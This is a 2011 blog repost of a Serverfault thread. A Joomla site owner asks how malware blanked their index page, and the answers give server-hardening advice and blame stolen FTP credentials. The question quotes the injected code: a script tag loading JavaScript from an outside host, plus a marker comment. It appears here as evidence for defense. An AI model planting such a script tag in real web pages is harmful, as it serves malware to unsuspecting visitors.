Tuesday, January 25, 2011

kollinsoy.skyefenton.com attack?

Recently My website was attacked by a Malware. it convert my index page into blank. The attack add 2 lines to my index.php :

<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--6aa6b5f1b4e70b5a72df7793c2b6e64b-->

I'm using joomla 1.5.11 with such considered secure server. How it happens and how to prevent it for the future.

From serverfault Ivan Slaughter

  • 1) latest updates.

    2) run IDS, and keep checksums of files that aren't supposed to be changing.

    3) consider putting in a system for versioning files that aren't supposed to be changing.

    4) don't run software that isn't necessary.

    5) isolate processes and services as much as possible and run with reduced privileges to the lowest level possible.

    6) subscribe to security and user mailing lists for software you use, like Joomla groups and software you're using for your servers.

    7) backup backup backup

    8) format and reinstall your server from known-good source. You don't know how far the compromise goes back or what rootkits or other issues have been introduced.

    9) install monitoring software on systems for your switches, routers, firewall...get to know "normal" traffic patterns from anomalies, then investigate when something starts looking weird.

    10) stay familiar with your business's servers and workflow. Familiar enough that you can just "Feel" when something isn't right with the servers. Investigate. Check logs.

    11) configure remote logging to a secured server. Compromised systems easily cover their tracks when the logs are local.

    12) pick up some books on system security or delegate someone to be in charge of updates, security issues, etc.

    13) isolate Internet-facing systems from your internal development, backup, etc. systems. Backups are no good if your internal systems are monitored by loggers and sniffers.

    14) keep researching server security with books and articles online, since this site cannot possibly cover everything you should know if you want to protect your business (and your customers) on a topic like that.

    Chris S : +1 "7) **backup backup backup"**
    Bart Silverstrim : i should have said that the backup should be more than a basic file backup but rather able to re-install from bare metal, and goes far enough back that you can reinstall pre-compromise.
    From Bart Silverstrim

  • That exploit typically takes place through a leaked ftp username/password

    From karmawhore

  • This is a common attack using stolen FTP credentials. So even if your Joomla install is secure, you need to use good passwords.

    First thing to do now is change your passwords asap.

    Details of this malware:

    http://blog.sucuri.net/2010/06/web-sites-hacked-with-malware-from-iopap-upperdarby26-com.html

    http://sucuri.net/malware/entry/MW:IOPAP:1

    Ivan Slaughter : Thanks sucuri, really helps my site survive.
    From sucuri
Posted by Mu Cat at 12:27 AM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)